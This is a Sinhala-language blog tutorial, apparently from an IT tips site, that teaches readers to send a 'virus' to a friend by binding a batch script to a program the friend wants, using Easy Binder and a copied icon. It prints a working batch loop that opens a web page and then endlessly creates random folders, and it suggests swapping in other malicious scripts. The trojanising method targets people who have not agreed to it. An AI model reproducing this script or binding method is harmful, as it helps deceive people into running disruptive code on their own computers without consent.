ඉතින් යාලුවනේ අද අරන් ආවෙ මන් නියම පොස්ට් එකක්. අපි හැමදාම ගේන්නෙ නියම පොස්ට් තමා ඒක එනම කතාවක්. කතා නැතුව අපි වැඩේට බහිමු. අද මන් කියල දෙන්නෙ උඩ කියල තියන විදිහට නියම ක්‍රමේට යාලුවට Virus යවන්න පොඩි වැඩ කෑල්ලක්. ගොඩක් අය notepad tricks, batch file tricks, vbs scripts කියල දුන්නට ඒව තව කාගෙ computer එක්ක run කරවල පොඩි ආතල් එකක් ගන්න කියල දෙන් නෑනෙ. ඒව කියල දෙන්න ඉන්නෙ ඉතින් IT දැනුම බෙදාගමු™ අපේ crew එකම තමා.
notepad tricks, batch file tricks, vbs scripts වලින් virus හදන හැටි දැන් මන් කියල දෙන් නෑ. මොකද කලින් මන් ගොඩක් දේවල් කියල දුන්න ඒ සම්බන්ධව. ඒ නිසා මන් ඔයාලට එවාගෙ link පහලින් දාන්නම්.
හරි දැන් අපි අද කරන්න ආපු වැඩේට බහිමු. මේකට අපි පොඩි බඩු ටිකක් උවමනා වෙනව.
- ඉහත තියන virus script වලින් එකක්. (notepad tricks, batch file tricks, vbs scripts)
- පොඩි software එකක්. (file එක bind කරන්න යාලුව ඉල්ලුව software එකක්නම් හොදයි. එතකොට මේක අනිව එයා run කරනවනේ.)
- icon එකක්. (ඔයාල virus එක යවන්න බාවිතා කරන software එකේ icon එක download කරගන්න ඕනෙ - https://www.iconfinder.com/)
- Easy Binder කියන software එක. (Use our download manager and get recommended downloads කියන තැන tick එක අයින් කරල download කරගන්න. Size: 930.87 KB)
හරි දැන් මේව ලෑස්තිනම් අපි වැඩේ පටන් ගමු. අපි උදාහරණයක් විදියට Folder ගොඩක් හැදෙන script එක ගමු. notepad එකකට මේ code එක අපි මුලින්ම copy කරගන්න ඕනෙ.
start http://itdanuma.com
@echo off
:top
md %random%
goto top
පසුව මෙය .bat විදිහට save කරගන්න ඕනෙ. (උ.දා folder10000.bat) මතක ඇතුව Save as Type එක All file දෙන්න.
හරි දැන් අපේ virus script එක ලෑස්තියි. දැන් අපි කරන්න ඕනෙ අපේ යාලුවට අපි දෙන software එකත් එක්ක මේක bind කරන එක. මේකට තමා අපි
Easy Binder කියන software එක යොදා ගන්නෙ.
දැන් ඉහත රූපයෙ ආකාරයට වින්ඩෝවක් ඔබට ලැබෙයි. මෙහි යටම පලවෙනි button එකෙන් ගොස් අපි තෝරාගත් software එක හා අපි හදපු virus script එක තෝරා ගන්න ඕනෙ.
පසුව මෙහි Settings tab එකට යන්න ඕනෙ.
මෙහි Select An Icon තැනට ගොස් අපි බා ගත් Icon එකත් තෝරල දෙන්න ඕනෙ. output folder එකත් දෙන්න. ඊට පස්සෙ Bind Files යන්න click කරන්න. දැන් අපේ file ටික ලස්සනට bind වෙයි.
දැන් අපේ virus ගිල්ලපු software එක ලෑස්තියි. අපිට තියෙන්නෙ මේක යාලුවට දෙන්න විතරයි. open කරපු ගමන් යටින් virus එක run වෙනව. පට්ට පට පට කිවුවලු.....
අපි මේකට use කරපු script එක වෙනුවට ඔයාලට වෙන virus එකක් යොදා ගන්නත් පුලුවන්.....
අපිට Like එකක් දාන්න අමතක කරන්න එපා.